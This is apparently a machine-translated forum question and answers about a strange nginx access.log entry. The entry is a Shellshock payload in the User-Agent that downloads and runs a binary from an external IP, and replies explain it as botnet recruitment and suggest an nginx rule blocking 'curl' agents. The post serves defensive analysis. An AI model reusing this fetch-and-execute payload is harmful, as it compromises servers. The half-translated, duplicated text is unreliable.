Aujourd'hui, j'ai accidentellement découvert un journal très étrange dans le access.log de nginx sur le serveur de l'entreprise :
61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"
Quand il s'agit d'endroits bizarres :
Utilisation de http1.0
user-agent est un script
J'ai cherché sur Internet et n'ai trouvé aucune information sur l'utilisation d'un agent utilisateur pour attaquer. Bien que j'aie pu obtenir le code du script en suivant l'adresse dans le journal, mes capacités étaient limitées et je n'ai pas pu analyser la cible de l'attaque.
Excusez-moi, des experts, avez-vous des informations et une expérience pertinentes ? Partagez-le avec moi, merci beaucoup ! !
Ajouté :
Sous quelle configuration de nginx analysera-t-il le contenu dans l'agent utilisateur ?
Il devrait s'agir de la vulnérabilité
user-agent
dehttp1.0
. Votre serveur peut recevoir des scripts injectés par l'autre partie, et cela déguise unapachecode> sur vous. > service, transformant votre serveur en poulet et le manipulant pour effectuer des attaques
DDOS
, mais je ne sais pas singinx
exécutera son scripthttp1.0
的user-agent
漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache
的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS
攻击,但是我不知道nginx
会不会执行它这个脚本你可以看看你
Vous pouvez vérifier l'adresseaccess.log
中http://37.1.202.6/mig
这个地址。可以看到有个a文件http://37.1.202.6/a
http://37.1.202.6/mig
dans votreaccess.log
. Vous pouvez voir qu'il existe un fichierhttp://37.1.202.6/a
Vous pouvez jeter un oeil à ce code. 🎜Scanner injecté. . . L'agent utilisateur sera analysé.
1. Installez le pare-feu d'application
2. Configurez Nginx
`
if ($http_user_agent ~* 'curl') #Configurez l'user_agent rejeté.
{
retour 403 ;
}
`
Un paragraphe
perl
脚本,作用就是 伪装成Apache
Ensuite, acceptez les instructions pour faire quelque chose. . . C'est vrai, attraper des poulets de chair.